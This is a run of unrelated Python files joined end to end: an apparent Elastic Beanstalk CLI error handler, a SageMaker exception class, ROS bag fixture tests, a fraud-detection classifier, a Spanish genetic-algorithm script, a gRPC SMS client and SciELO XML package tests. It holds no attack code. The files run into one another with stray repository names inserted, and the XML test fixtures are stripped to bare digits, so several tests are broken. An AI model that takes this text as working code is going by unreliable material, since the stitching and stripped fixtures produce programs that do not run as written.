squash_cement_logging() try: app.setup() app.run() app.close() except CaughtSignal: io.echo() app.close(code=5) except NoEnvironmentForBranchError: app.close(code=5) except InvalidStateError: io.log_error(strings['exit.invalidstate']) app.close(code=3) except NotInitializedError: io.log_error(strings['exit.notsetup']) app.close(code=126) except NoSourceControlError: io.log_error(strings['sc.notfound']) app.close(code=3) except NoRegionError: io.log_error(strings['exit.noregion']) app.close(code=3) except ConnectionError: io.log_error(strings['connection.error']) app.close(code=2) except ArgumentTypeError: io.log_error(strings['exit.argerror']) app.close(code=4) except TooManyPlatformsError: io.log_error(strings['toomanyplatforms.error']) app.close(code=4) except EBCLIException as e: if '--verbose' in sys.argv or '--debug' in sys.argv: io.log_info(traceback.format_exc()) else: io.log_error('{0} - {1}'.format(e.__class__.__name__, e.message)) app.close(code=4) except Exception as e: if str(e): message = '{exception_class} - {message}'.format( exception_class=e.__class__.__name__, message=str(e) ) else: message = '{exception_class}'.format( exception_class=e.__class__.__name__ ) if '--verbose' in sys.argv or '--debug' in sys.argv: io.log_info(traceback.format_exc()) io.log_info(message) else: io.log_error(message) app.close(code=4) def squash_cement_logging(): for d, k in iteritems(logging.Logger.manager.loggerDict): if d.startswith('cement') and isinstance(k, logging.Logger): k.setLevel('ERROR') #!/usr/bin/env python # -*- coding: utf-8 -*- class Goose(object): @property def name(self): return "Mr Stabby" class Hamster(object): @property def name(self): return "Phil" class _SecretSquirrel(object): @property def name(self): return "Mr Anonymous"eitansela/sagemaker-python-sdk1-10 # Copyright 2019-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. """Custom exception classes for Sagemaker SDK""" from __future__ import absolute_import class UnexpectedStatusException(ValueError): """Raised when resource status is not expected and thus not allowed for further execution""" def __init__(self, message, allowed_statuses, actual_status): self.allowed_statuses = allowed_statuses self.actual_status = actual_status super(UnexpectedStatusException, self).__init__(message) #!/usr/bin/env python # vim: tabstop=2 shiftwidth=2 expandtab # Copyright 2020 Maintainers of PSegs-ROS-Ext # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections import os import random import subprocess import sys import numpy as np ############################################################################### ### Utils def nanostamp_to_rostime(nanostamp): import rospy # For a good time see: # https://github.com/pgao/roscpp_core/commit/dffa31afe8d7f1268a3fa227408aeb6e04a28b87#diff-65b9485bd6b5d3fb4b7a84cd975c3967L157 return rospy.Time( secs=int(nanostamp / 1000000000), nsecs=int(nanostamp % 1000000000)) def to_ros_arr(arr): return arr.flatten(order='C').tolist() ############################################################################### ### ROS Message Generators def gen_transform(nanostamp): import tf from tf2_msgs.msg import TFMessage from geometry_msgs.msg import Transform from geometry_msgs.msg import TransformStamped tf_msg = TFMessage() tf_transform = TransformStamped() tf_transform.header.stamp = nanostamp_to_rostime(nanostamp) tf_transform.header.frame_id = 'src_frame' tf_transform.child_frame_id = 'child_frame' transform = Transform() r_4x4 = np.ones((4, 4)) q = tf.transformations.quaternion_from_matrix(r_4x4) transform.rotation.x = q[0] transform.rotation.y = q[1] transform.rotation.z = q[2] transform.rotation.w = q[3] transform.translation.x = 1 transform.translation.y = 2 transform.translation.z = 3 tf_transform.transform = transform tf_msg.transforms.append(tf_transform) return tf_msg def gen_camera_info(nanostamp): from sensor_msgs.msg import CameraInfo info = CameraInfo() info.header.frame_id = 'camera_frame' info.header.stamp = nanostamp_to_rostime(nanostamp) info.width = 100 info.height = 200 info.distortion_model = 'plumb_bob' K = np.ones((3, 3)) info.K = to_ros_arr(K) P = np.zeros((3, 4)) info.P = to_ros_arr(P) return info def gen_camera_image(nanostamp): import cv2 from cv_bridge import CvBridge bridge = CvBridge() # Create a fake image img = np.zeros((200, 100, 3), dtype=np.uint8) from PIL import Image p_img = Image.fromarray(img) from io import BytesIO with BytesIO() as output: p_img.save(output, 'PNG') img_bytes = bytearray(output.getvalue()) # Do a dance to get a CV Img, which has good interop with ROS img_arr = np.asarray(img_bytes, dtype=np.uint8) cv_img = cv2.imdecode(img_arr, cv2.IMREAD_UNCHANGED) ros_img_msg = bridge.cv2_to_imgmsg(cv_img, encoding='bgr8') ros_img_msg.header.frame_id = 'camera_frame' ros_img_msg.header.stamp = nanostamp_to_rostime(nanostamp) return ros_img_msg def gen_pcl_cloud(nanostamp): from sensor_msgs.msg import PointField from std_msgs.msg import Header import sensor_msgs.point_cloud2 as pcl2 header = Header() header.frame_id = 'pointsensor' header.stamp = nanostamp_to_rostime(nanostamp) points = np.zeros((10, 3), dtype=np.float32) fields = [PointField('x', 0, PointField.FLOAT32, 1), PointField('y', 4, PointField.FLOAT32, 1), PointField('z', 8, PointField.FLOAT32, 1)] pcl_msg = pcl2.create_cloud(header, fields, points) return pcl_msg def gen_ros_color(): """color in [0, 1] -> ROS color""" from std_msgs.msg import ColorRGBA r, g, b = (.5, .5, .5) ros_color = ColorRGBA() ros_color.r = r ros_color.g = g ros_color.b = b ros_color.a = 1. return ros_color def gen_marker(): from geometry_msgs.msg import Point from visualization_msgs.msg import Marker m = Marker() m.type = Marker.LINE_LIST # pairs of points create a line m.action = Marker.MODIFY # or add m.color = gen_ros_color() m.scale.x = 0.1 startp = Point() startp.x, startp.y, startp.z = (1, 2, 3) endp = Point() endp.x, endp.y, endp.z = (3, 4, 5) m.points += [startp, endp] return m def gen_marker_array(nanostamp): from visualization_msgs.msg import MarkerArray marray = MarkerArray() for obj_id in range(10): from std_msgs.msg import Header header = Header() header.frame_id = 'marker' header.stamp = nanostamp_to_rostime(nanostamp) markers = [gen_marker() for _ in range(10)] for mid, m in enumerate(markers): m.id = obj_id * 10 + mid m.ns = str(obj_id) m.header = header marray.markers += markers return marray # A container compatible with both ROSBag as well as ROS Publishers ROSMsgEntry = collections.namedtuple( 'ROSMsgEntry', ('topic', 'timestamp', 'msg')) def gen_msg_fixture(start_time_sec=1, end_time_sec=10): for t in np.arange(start_time_sec, end_time_sec + 1, 0.5): t_ns = int(t * 1e9) topic_to_msgs = { '/tf': [gen_transform(t_ns)], '/camera/camera_info': [gen_camera_info(t_ns)], '/camera/image_raw': [gen_camera_image(t_ns)], '/pointsensor/cloud': [gen_pcl_cloud(t_ns)], '/labels': [gen_marker_array(t_ns)], } for topic, msgs in topic_to_msgs.items(): for msg in msgs: yield ROSMsgEntry( topic=topic, timestamp=nanostamp_to_rostime(t_ns), msg=msg) ############################################################################### ### Tests def test_ros_msg_generation(): msgs = list(gen_msg_fixture(start_time_sec=1, end_time_sec=2)) assert len(msgs) == 20 EXPECTED_BAGINFO = """ path: /tmp/psegs_test_rospy.bag version: 2.0 duration: 9.5s start: Jan 01 1970 00:00:01.00 (1.00) end: Jan 01 1970 00:00:10.50 (10.50) size: 1.6 MB messages: 100 compression: none [3/3 chunks] types: sensor_msgs/CameraInfo [c9a58c1b0b154e0e6da7578cb991d214] sensor_msgs/Image [060021388200f6f0f447d0fcd9c64743] sensor_msgs/PointCloud2 [1158d486dd51d683ce2f1be655c3c181] tf2_msgs/TFMessage [94810edda583a504dfda3829e70d7eec] visualization_msgs/MarkerArray [d155b9ce5188fbaf89745847fd5882d7] topics: /camera/camera_info 20 msgs @ 2.0 Hz : sensor_msgs/CameraInfo /camera/image_raw 20 msgs @ 2.0 Hz : sensor_msgs/Image /labels 20 msgs @ 2.0 Hz : visualization_msgs/MarkerArray /pointsensor/cloud 20 msgs @ 2.0 Hz : sensor_msgs/PointCloud2 /tf 20 msgs @ 2.0 Hz : tf2_msgs/TFMessage """ def test_rosbag_io(): BAG_PATH = '/tmp/psegs_test_rospy.bag' n = 0 import rosbag with rosbag.Bag(BAG_PATH, mode='w') as bw: for rme in gen_msg_fixture(start_time_sec=1, end_time_sec=10): bw.write(rme.topic, rme.msg, t=rme.timestamp) n += 1 assert n == 100 with rosbag.Bag(BAG_PATH, mode='r') as br: assert str(br).strip() == EXPECTED_BAGINFO.strip() Credit Card Fraud Detection/model.py import warnings warnings.filterwarnings('ignore') warnings.simplefilter('ignore') import pandas as pd import matplotlib.pyplot as plt from matplotlib.patches import Rectangle import numpy as np from pprint import pprint as pp import csv from pathlib import Path from imblearn.over_sampling import SMOTE from imblearn.pipeline import Pipeline from sklearn.linear_model import LinearRegression, LogisticRegression from sklearn.model_selection import train_test_split, GridSearchCV from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import r2_score, classification_report, confusion_matrix, accuracy_score, roc_auc_score, roc_curve, precision_recall_curve, average_precision_score from sklearn.metrics import homogeneity_score, silhouette_score from sklearn.ensemble import RandomForestClassifier, VotingClassifier import seaborn as sns import pickle import pandas as pd df = pd.read_csv("creditcard.csv") # print(df.head()) #print(df.info()) # Visualizing The Target feature plt.figure(figsize=(10,6)) g = sns.countplot(df['Class']) g.set_xticklabels(['Not Fraud','Fraud']) plt.show() # Count the occurrences of fraud and no fraud and print them occ = df['Class'].value_counts() # print(occ) # Print the ratio of fraud cases ratio_cases = occ/len(df.index) # print(f'Ratio of fraudulent cases: {ratio_cases[1]}\nRatio of non-fraudulent cases: {ratio_cases[0]}') def prep_data(df: pd.DataFrame): """ Convert the DataFrame into two variable X: data columns (V1 - V28) y: lable column """ X = df.iloc[:, :30].values y = df.Class.values return X, y # Define a function to create a scatter plot of our data and labels def plot_data(X: np.ndarray, y: np.ndarray): plt.scatter(X[y == 0, 0], X[y == 0, 1], label="Class #0", alpha=0.5, linewidth=0.15) plt.scatter(X[y == 1, 0], X[y == 1, 1], label="Class #1", alpha=0.5, linewidth=0.15, c='r') plt.legend() return plt.show() # Create X and y from the prep_data function X, y = prep_data(df) # Plot our data by running our plot data function on X and y plot_data(X, y) plt.scatter(df.V2[df.Class == 0], df.V3[df.Class == 0], label="Class #0", alpha=0.5, linewidth=0.15) plt.scatter(df.V2[df.Class == 1], df.V3[df.Class == 1], label="Class #1", alpha=0.5, linewidth=0.15, c='r') plt.legend() plt.show() # Run the prep_data function X, y = prep_data(df) print(f'X shape: {X.shape}\ny shape: {y.shape}') # Define the resampling method method = SMOTE() # Create the resampled feature set X_resampled, y_resampled = method.fit_resample(X, y) # Plot the resampled data plot_data(X_resampled, y_resampled) pd.value_counts(pd.Series(y)) pd.value_counts(pd.Series(y_resampled)) def compare_plot(X: np.ndarray, y: np.ndarray, X_resampled: np.ndarray, y_resampled: np.ndarray, method: str): plt.subplot(1, 2, 1) plt.scatter(X[y == 0, 0], X[y == 0, 1], label="Class #0", alpha=0.5, linewidth=0.15) plt.scatter(X[y == 1, 0], X[y == 1, 1], label="Class #1", alpha=0.5, linewidth=0.15, c='r') plt.title('Original Set') plt.subplot(1, 2, 2) plt.scatter(X_resampled[y_resampled == 0, 0], X_resampled[y_resampled == 0, 1], label="Class #0", alpha=0.5, linewidth=0.15) plt.scatter(X_resampled[y_resampled == 1, 0], X_resampled[y_resampled == 1, 1], label="Class #1", alpha=0.5, linewidth=0.15, c='r') plt.title(method) plt.legend() plt.show() compare_plot(X, y, X_resampled, y_resampled, method='SMOTE') # Split your data into training and test set X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0) def get_model_results(X_train: np.ndarray, y_train: np.ndarray, X_test: np.ndarray, y_test: np.ndarray, model): """ model: sklearn model (e.g. RandomForestClassifier) """ # Fit your training model to your training set model.fit(X_train, y_train) # dumping model into pickel file with open('model_pickle','wb') as f: pickle.dump(model,f) # Obtain the predicted values and probabilities from the model predicted = model.predict(X_test) try: probs = model.predict_proba(X_test) print('ROC Score:') print(roc_auc_score(y_test, probs[:,1])) except AttributeError: pass # Print the ROC curve, classification report and confusion matrix print('\nClassification Report:') print(classification_report(y_test, predicted)) print('\nConfusion Matrix:') print(confusion_matrix(y_test, predicted)) return predicted # Define the three classifiers to use in the ensemble clf1 = LogisticRegression(class_weight={0:1, 1:15}, random_state=5, solver='liblinear') clf2 = RandomForestClassifier(class_weight={0:1, 1:12}, criterion='gini', max_depth=8, max_features='log2', min_samples_leaf=10, n_estimators=30, n_jobs=-1, random_state=5) clf3 = DecisionTreeClassifier(random_state=5, class_weight="balanced") # Combine the classifiers in the ensemble model # ensemble_model = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('dt', clf3)], voting='hard') # Get the results # get_model_results(X_train, y_train, X_test, y_test, ensemble_model) # Define the ensemble model ensemble_model = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='soft', weights=[1, 4, 1], flatten_transform=True) # Get results get_model_results(X_train, y_train, X_test, y_test, ensemble_model) 0 ''' * Autores: - , C.I: 24.423.188 - , C.I: 25.582.661 * Electiva: Introduccion a la IA * Profesor: ''' # Modulos from random import random from math import sin, fabs, ceil, log10 # Desarrollo de funciones def float_to_bin(x, n_bits): ''' Retorna el equivalente en binario de x ''' binary = bin(int(str(x).split('.')[1])).lstrip('0b') n = len(binary) if n < n_bits: binary = ('0' * (n_bits - n)) + binary return binary def create_population(n, n_bits): ''' Genera una poblacion de N individuos unicos ''' population = [] i = 0 while i < n: x = random() try: population.index(x) continue except: x = round(x, 7) population.append({'x': x, 'binary': float_to_bin(x, n_bits)}) i += 1 return population def evaluate(population): ''' Agrega el valor de la adaptacion a cada individuo de la poblacion ''' for individual in population: individual['fadap'] = scientific_notation(round(float(individual['x']) + fabs(sin(32 * float(individual['x']))), 7)) def add_adaptations(population): ''' Retorna la suma de todas las adaptaciones de los individuos que forman la poblacion de entrada ''' add = 0 for individual in population: add += float(individual['fadap']) return add def show_progress(population, cases, generation = 0): ''' Muestra la estadistica de la generacion actual''' file = 'out' + str(cases) + '.txt' out = open(file, "a") if generation: out.write('\n') out.write('GENERACION ACTUAL: {}\n'.format(generation)) out.write('Mejor adaptacion: {}, Adaptacion promedio: {}\n\n'.format(population[0].get('fadap'), round(add_adaptations(population) / len(population), 7))) out.write('No\tCromosoma\t\t\t\t\tValor real\t\tAdaptacion\n') i = 0 for individual in population: if i < 11 or i >= 91: out.write('{}\t{}\t{}\t\t{}\n'.format((i + 1), individual['binary'], individual['x'], individual['fadap'])) if i == 11: out.write('...\t\t\t\t\t\t\t\t\t\t\t...\n'.format((i + 1), individual['binary'], individual['x'], individual['fadap'])) i += 1 out.close() def selection_probability(population): ''' Agrega el valor de la probabilidad de seleccion a cada individuo de la poblacion ''' t = add_adaptations(population) for individual in population: individual['prob'] = float(individual['fadap']) / t def search(search_space, elem): ''' Retorna el indice donde se encuentre elem ''' i = 0 n = len(search_space) found = False while i < n and not found: if elem <= search_space[i]: found = True else: i += 1 return i def roulette_wheel(population): ''' Retorna dos individuos aleatorios ''' roulette = [] for individual in population: if roulette == []: elem = individual['prob'] else: elem = individual['prob'] + roulette[-1] roulette.append(elem) while True: p1 = search(roulette, random()) p2 = search(roulette, random()) if p1 != p2: break return p1, p2 def encode(num, n_bits): ''' Dado un numero real, obtiene su correspondiente numero entero ''' return ceil(num * (2 ** n_bits - 1)) def decoding(num, n_bits): ''' Dado un numero entero, obtiene su correspondiente numero real ''' return round(1 / (num / (2 ** n_bits - 1)), 7) def scientific_notation(num): ''' Convierte el numero real de formato x.xxe-0x a 0.0000xxx ''' if (str(num).find('e') != -1): num = format(float(num), '.7f') return num def modification_point(prob, n_bits): ''' Retorna el punto de modificacion de bits para el cruce y la mutacion ''' while True: i = 1 found = False while i <= n_bits and not found: if round(random(), 7) <= prob: found = True else: i += 1 if i <= n_bits: break return i def crossing(parent1, parent2, pc, n_bits): ''' Retorna 2 hijos de dos individuos ''' parent1 = encode(parent1, n_bits) parent2 = encode(parent2, n_bits) while True: point = modification_point(pc, n_bits) h1 = (parent1 >> point) | (parent2 << point) h2 = (parent1 << point) | (parent2 >> point) h1 = decoding(h1, n_bits) h2 = decoding(h2, n_bits) if 0 <= h1 <= 1 and 0 <= h2 <= 1 and h1 != h2: break h1, h2 = scientific_notation(h1), scientific_notation(h2) return h1, h2 def mutation(p1, p2, pm, n_bits): ''' Retorna la mutacion de p1 y p2 ''' binary_h1 = float_to_bin(p1, n_bits) binary_h2 = float_to_bin(p2, n_bits) while True: point = modification_point(pm, n_bits) if binary_h1[point - 1] == '0': h1 = encode(p1, n_bits) | 1 << point else: h1 = encode(p1, n_bits) ^ 1 << point if binary_h2[point - 1] == '0': h2 = encode(p2, n_bits) | 1 << point else: h2 = encode(p2, n_bits) ^ 1 << point h1, h2 = decoding(h1, n_bits), decoding(h2, n_bits) if 0 <= h1 <= 1 and 0 <= h2 <= 1 and h1 != h2: break h1, h2 = scientific_notation(h1), scientific_notation(h2) return h1, h2 def main(): ''' Cuerpo principal ''' # Entrada try: input = open("in.txt", "r") except: raise 'Error, no se encontro el archivo in.txt' # Procesos cases = 0 n_bits = ceil(log10(10 ** 7) / log10(2)) for line in input: cases += 1 test = line.split(' ') n = int(test[0]) pc = float(test[1]) pm = float(test[2]) generations = int(test[3]) gap = int(test[4]) # Inicializar la poblacion cont_new_individuals = ceil(n * gap / 100) population = create_population(n, n_bits) evaluate(population) # Ordenando en forma decreciente population.sort(key = lambda individual: float(individual['fadap']), reverse = True) # Mostrar avances show_progress(population, cases) # Recorriendo las generaciones for t in range(generations): # Inicializando la nueva poblacion descendants = [{'x': population[i]['x']} for i in range(0, n - cont_new_individuals)] # Generando probabilidades de seleccion selection_probability(population) # Creando los nuevos individuos i = 0 while i < cont_new_individuals: # Seleccionando los padres p1, p2 = roulette_wheel(population) elements = False # Cruce if round(random(), 7) < pc: elements = True h1, h2 = crossing(population[p1]['x'], population[p2]['x'], pc, n_bits) else: # Mutacion if round(random(),7) < pm: elements = True h1, h2 = mutation(population[p1]['x'], population[p2]['x'], pm, n_bits) # Aagregando a los nuevos individuos if elements: try: descendants.index(h1) except: descendants.append({'x': h1}) i += 1 try: descendants.index(h2) except: if i < cont_new_individuals: # Agrego los dos hijos descendants.append({'x': h2}) i += 1 else: continue # Creando el equivalente en binario para cada individuo de los descendientes for individual in descendants: individual['binary'] = float_to_bin(individual['x'], n_bits) # Evaluando la poblacion descendiente evaluate(descendants) # Ordenando la poblacion descendientes en forma decreciente descendants.sort(key = lambda individual: float(individual['fadap']), reverse = True) # Mostrar avances show_progress(descendants, cases, t + 1) population = descendants[:] descendants.clear() population.clear() # Salida input.close if __name__ == '__main__': main()import grpc from environs import Env from .stub import sms_pb2 from .stub import sms_pb2_grpc env = Env() env.read_env() JARVIS_HOST = env.str('JARVIS_HOST', default='localhost') JARVIS_PORT = env.int('JARVIS_PORT', default=54321) JARVIS_SERVER = f'{JARVIS_HOST}:{JARVIS_PORT}' def sms_admin(message, app=None): with grpc.insecure_channel(JARVIS_SERVER) as channel: stub = sms_pb2_grpc.SMSStub(channel) response = stub.SMSAdmin(sms_pb2.AuAdminSMSRequest(message=message, app=app)) return response.success,response.detail def sms_au(mobile_number, message, app=None): with grpc.insecure_channel(JARVIS_SERVER) as channel: stub = sms_pb2_grpc.SMSStub(channel) response = stub.SMSAu(sms_pb2.AuSMSRequest(mobile_number=mobile_number, message=message, app=app)) return response.success, response.detail def sms_aliyun(business_id, mobile_numbers, template_code, template_param, app=None): with grpc.insecure_channel(JARVIS_SERVER) as channel: stub = sms_pb2_grpc.SMSStub(channel) response = stub.SMSAliyun( sms_pb2.AliyunSMSRequest(business_id=business_id, mobile_numbers=mobile_numbers, template_code=template_code, template_param=template_param, app=app)) return response.success, response.detail import unittest from unittest import mock from lxml import etree from . import utils from documentstore_migracao.export.sps_package import ( parse_value, parse_issue, SPS_Package, NotAllowedtoChangeAttributeValueError, InvalidAttributeValueError, InvalidValueForOrderError, is_valid_value_for_order, is_valid_value_for_issns, SourceJson, ) def pubdate_xml(year, month, day): LABELS = ["year", "month", "day"] values = [year, month, day] xml = "".join( [ ("<{}>".format(label) + str(values[n]) + "".format(label)) for n, label in enumerate(LABELS) ] ) return """{}""".format(xml) def sps_package(article_meta_xml, doi="10.1590/S0074-02761962000200006"): xml = utils.build_xml(article_meta_xml, doi) xmltree = etree.fromstring(xml) return SPS_Package(xmltree, "a01") class Test_MatchPubDate1(unittest.TestCase): def setUp(self): self.xml = """
2010513 201223
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('pub-date[@date-type="pub"]', 'pub-date[@date-type="collection"]') ) self.assertEqual(result.findtext("year"), "2010") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "05", "13")) def test_documents_bundle_pubdate(self): self.assertEqual( self.sps_package.documents_bundle_pubdate, ("2012", "02", "03") ) def test_transform_pubdate(self): self.sps_package.transform_pubdate() xpaths_results = ( ('="pub"]', ("2010", "5", "13")), ('="collection"]', ("2012", "2", "3")), ) for xpath, result in xpaths_results: with self.subTest(xpath=xpath, result=result): pubdate = self.sps_package.article_meta.find(xpath) self.assertIsNotNone(pubdate) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), result[0]) self.assertEqual(pubdate.findtext("month"), result[1]) self.assertEqual(pubdate.findtext("day"), result[2]) class Test_MatchPubDate1_Season(unittest.TestCase): def setUp(self): xml = """
2010513 2012Jan-Feb
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('[@="pub"]', 'pub-[@="collection"]') ) self.assertEqual(result.findtext("year"), "2010") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "05", "13")) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_transform_pubdate(self): self.sps_package.transform_pubdate() pubdate = self.sps_package.article_meta.find('pub-date[@date-type="pub"]') self.assertIsNotNone(pubdate) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), "2010") self.assertEqual(pubdate.findtext("month"), "5") self.assertEqual(pubdate.findtext("day"), "13") pubdate = self.sps_package.article_meta.find( 'pub-date[@date-type="collection"]' ) self.assertIsNotNone(pubdate) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), "2012") self.assertEqual(pubdate.findtext("season"), "Jan-Feb") class Test_MatchPubDate2(unittest.TestCase): def setUp(self): xml = """
201041 2012
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('pub-date[@pub-type="epub"]', 'pub-date[@pub-type="collection"]') ) self.assertEqual(result.findtext("year"), "2010") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "04", "01")) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_transform_pubdate(self): self.sps_package.transform_pubdate() xpaths_results = ( ('[@="pub"]', ("2010", "4", "1")), ('pub-[@="collection"]', ("2012", None, None)), ) for xpath, result in xpaths_results: with self.subTest(xpath=xpath, result=result): pubdate = self.sps_package.article_meta.find(xpath) self.assertIsNotNone(pubdate) self.assertIsNone(pubdate.attrib.get("pub-type")) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), result[0]) self.assertEqual(pubdate.findtext("month"), result[1]) self.assertEqual(pubdate.findtext("day"), result[2]) class Test_MatchPubDate3(unittest.TestCase): def setUp(self): xml = """
2010910 2011
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('pub-date[@="collection"]', 'pub-[@="epub-ppub"]') ) self.assertEqual(result.findtext("year"), "2011") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "09", "10")) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2011", "", "")) def test_transform_pubdate(self): self.sps_package.transform_pubdate() xpaths_results = ( ('pub-[@="pub"]', ("2010", "9", "10")), ('pub-[@="collection"]', ("2011", None, None)), ) for xpath, result in xpaths_results: with self.subTest(xpath=xpath, result=result): pubdate = self.sps_package.article_meta.find(xpath) self.assertIsNotNone(pubdate) self.assertIsNone(pubdate.attrib.get("pub-type")) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), result[0]) self.assertEqual(pubdate.findtext("month"), result[1]) self.assertEqual(pubdate.findtext("day"), result[2]) class Test_MatchPubDate4(unittest.TestCase): def setUp(self): xml = """
201091 2011 20122
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('pub-date[@="pub"]', 'pub-date[@date-type="collection"]') ) self.assertEqual(result.findtext("year"), "2010") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "09", "01")) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "02", "")) def test_transform_pubdate(self): self.sps_package.transform_pubdate() xpaths_results = ( ('pub-date[@date-type="pub"]', ("2010", "9", "1")), ('pub-date[@="collection"]', ("2012", "2", None)), ) for xpath, result in xpaths_results: with self.subTest(xpath=xpath, result=result): pubdate = self.sps_package.article_meta.find(xpath) self.assertIsNotNone(pubdate) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), result[0]) self.assertEqual(pubdate.findtext("month"), result[1]) self.assertEqual(pubdate.findtext("day"), result[2]) class Test_SPS_package(unittest.TestCase): def test_parse_value_num(self): self.assertEqual(parse_value("3"), "03") def test_parse_value_num_spe(self): self.assertEqual(parse_value("Especial"), "spe") def test_parse_value_suppl(self): self.assertEqual(parse_value("Supplement"), "s") def test_parse_issue_num_suppl(self): self.assertEqual(parse_issue("3 Supl"), "03-s0") def test_parse_issue_num_spe_(self): self.assertEqual(parse_issue("4 Especial"), "04-spe") def test_parse_issue_num_suppl_label(self): self.assertEqual(parse_issue("3 Supl A"), "03-sa") def test_parse_issue_num_spe_num(self): self.assertEqual(parse_issue("4 Especial 1"), "04-spe01") def test_parse_issue_suppl_label(self): self.assertEqual(parse_issue("Supl A"), "sa") def test_parse_issue_spe_num(self): self.assertEqual(parse_issue("Especial 1"), "spe01") class Test_SPS_Package(unittest.TestCase): def setUp(self): article_xml = """ """ self.sps_package = SPS_Package(etree.fromstring(article_xml), "a01") def test_elements_which_has_xlink_href(self): items = list(self.sps_package.elements_which_has_xlink_href) self.assertEqual(len(items), 7) self.assertEqual( [node.tag for node in items], sorted( [ "inline-graphic", "graphic", "ext-link", "ext-link", "inline-supplementary-material", "supplementary-material", "media", ] ), ) def test_replace_assets(self): expected = [ ("a01tab02.gif", "a01-gtab02"), ("a01f01.gif", "a01-gf01"), ("a01tab01.gif", "a01-gtab01"), ("a01tab03.gif", "a01-gtab03"), ("a01tab04.gif", "a01-gtab04"), ("a01tab04.gif", "a01-gtab04"), ] items = self.sps_package.replace_assets_names() self.assertEqual(len(items), 6) for i, item in enumerate(items): with self.subTest(i): self.assertEqual(expected[i][0], item[0]) self.assertEqual(expected[i][1], item[1]) def test_get_renditions_metadata_no_renditions(self): renditions, renditions_metadata = self.sps_package.get_renditions_metadata() self.assertEqual(renditions, []) self.assertEqual(renditions_metadata, {}) def test_get_renditions_metadata(self): article_xml = """ Texto completo somente em PDF (EN) Texto completo somente em PDF (PT) """ self.sps_package = SPS_Package(etree.fromstring(article_xml), "a01") renditions, renditions_metadata = self.sps_package.get_renditions_metadata() self.assertEqual( renditions, [ ('http://www.scielo.br/pdf/aa/v1n1/a01.pdf', 'a01'), ('http://www.scielo.br/pdf/aa/v1n1/pt_a01.pdf', 'pt_a01'), ] ) self.assertEqual( renditions_metadata, { 'en': 'http://www.scielo.br/pdf/aa/v1n1/a01.pdf', 'pt': 'http://www.scielo.br/pdf/aa/v1n1/pt_a01.pdf', } ) class Test_SPS_Package_No_Metadata(unittest.TestCase): def setUp(self): article_xml = """ """ self.sps_package = SPS_Package(etree.fromstring(article_xml), "a01") def test_parse_article(self): self.assertEqual(self.sps_package.parse_article_meta, []) def test_package_name(self): self.assertEqual(self.sps_package.package_name, "a01") def test_asset_package_name_f01(self): self.assertEqual(self.sps_package.asset_name("a01f01.jpg"), "a01-gf01.jpg") def test_asset_package_name_any_img(self): self.assertEqual(self.sps_package.asset_name("img.jpg"), "a01-gimg.jpg") def test_journal_meta(self): self.assertEqual(self.sps_package.journal_meta, []) def test_parse_article_meta(self): self.assertEqual(self.sps_package.parse_article_meta, []) class Test_SPS_Package_VolNumFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume 5 fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "05"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, None) def test_number(self): self.assertEqual(self.sps_package.number, "5") def test_package_name_vol_num_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-05-fpage-lpage" ) def test_asset_package_name_f01(self): self.assertEqual( self.sps_package.asset_name("a01f01.jpg"), 